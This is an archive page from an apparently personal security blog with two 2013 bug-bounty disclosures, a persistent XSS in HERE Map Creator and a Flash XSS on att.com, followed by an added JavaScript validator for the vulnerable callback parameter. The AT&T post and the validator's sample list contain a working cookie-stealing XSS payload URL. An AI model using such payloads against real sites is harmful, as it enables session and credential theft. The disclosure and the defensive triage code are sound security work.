
Showing posts from October, 2013

Dangerous Persistent XSS at Here.com [FIX]

Here.com is a Nokia business unit that brings together Nokia's mapping and location assets under one brand. The technology of Here is based on a cloud-computing model, in which location data and services are stored on remote servers so that users have access to them regardless of which device they use.

HERE Map Creator is a service launched by Nokia in November 2012 to allow users to map their neighborhood.

With this bug I could SAVE a road name with a payload on the map. Any user who tries to re-edit the street name will get this XSS.
I reported a similar bug to Waza.com a few months ago.





Nokia Response:



Thanks to Nokia for starting this bug bounty program.

FLASH XSS AT ATT.COM [FIX]

I found a Flash XSS at AT&T's main domain where an attacker could steal users' credentials.

Vuln URL:
http://www.att.com/media/en_US/scripts/JSAM/JSAM_VideoPlayer.swf?completeHandler=JSAM.flashCompleteHandler);}catch(e) {alert(document.cookie);}//&source=https://www.wireless.att.com/home/video_progressive/video_marquees/B2CNDA-24-emerald-hp-marquee-bkd.mp4
Payload: JSAM.flashCompleteHandler);}catch(e) {alert(document.cookie);}//

Flash Vuln Code:
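public function videoPlayer_completeHandler(_arg1:VideoEvent):void {
    if (ExternalInterface.available) {
        // completeHandler is the value of the completeHandler URL parameter
        // (see Vuln URL above); it is used as the JavaScript function name
        // without any validation.
        ExternalInterface.call(completeHandler, ExternalInterface.objectID);
    } else {
        trace("JSAM_VideoPlayer cannot call completeHandler because ExternalInterface is not available.");
    };
}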
Proof:

After 2 months AT&T Response:



I hope to be on the top 10 Award :)
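
The unvalidated completeHandler value from the AT&T post above, shown from the defender's side. This is an added example, not code from the original post or from AT&T: it checks the parameter against a strict identifier pattern plus an allowlist, and triages constructed request URLs. The host swf.example, the allowlist contents, the function names and the simplified wrapper in modelExternalCall are assumptions.

```javascript
// Added example (constructed): not code from the post or from AT&T.

// A callback name must be a plain dotted identifier path: no parentheses,
// braces, semicolons, whitespace or comment markers.
const IDENT_PATH = /^[A-Za-z_$][A-Za-z0-9_$]*(\.[A-Za-z_$][A-Za-z0-9_$]*)*$/;

// Assumption: the only handler the embedding pages legitimately use.
const ALLOWED_HANDLERS = new Set(['JSAM.flashCompleteHandler']);

function classifyCallback(name) {
  if (typeof name !== 'string' || !IDENT_PATH.test(name)) return 'reject-syntax';
  return ALLOWED_HANDLERS.has(name) ? 'allow' : 'reject-unlisted';
}

// Simplified model of the JavaScript that Flash Player evaluates for
// ExternalInterface.call(fn, arg): fn is pasted in verbatim, so anything
// that is not a bare function name changes the structure of the statement.
function modelExternalCall(fn, arg) {
  return 'try { __flash__toXML(' + fn + '(' + JSON.stringify(arg) +
         ')) ; } catch (e) { "<undefined/>"; }';
}

// Pull the completeHandler parameter out of a requested SWF URL and classify it.
function triageSwfRequest(rawUrl) {
  const value = new URL(rawUrl).searchParams.get('completeHandler');
  return { value, verdict: value === null ? 'absent' : classifyCallback(value) };
}

// Constructed sample requests; swf.example is a placeholder host.
const SAMPLE_REQUESTS = [
  'http://swf.example/JSAM_VideoPlayer.swf?completeHandler=JSAM.flashCompleteHandler&source=a.mp4',
  'http://swf.example/JSAM_VideoPlayer.swf?completeHandler=JSAM.flashCompleteHandler);}catch(e) {alert(document.cookie);}//&source=a.mp4',
  'http://swf.example/JSAM_VideoPlayer.swf?completeHandler=window.somethingElse&source=a.mp4',
  'http://swf.example/JSAM_VideoPlayer.swf?source=a.mp4',
];

// Requests whose callback value should be blocked or investigated.
function flaggedRequests(urls) {
  return urls.map(triageSwfRequest).filter(r => r.verdict.startsWith('reject'));
}

for (const url of SAMPLE_REQUESTS) {
  const { value, verdict } = triageSwfRequest(url);
  console.log(verdict.padEnd(16), value);
}
```

The same two checks belong inside the SWF, before the value reaches ExternalInterface.call, since a filter in front of the file can be bypassed wherever the SWF is served from another path.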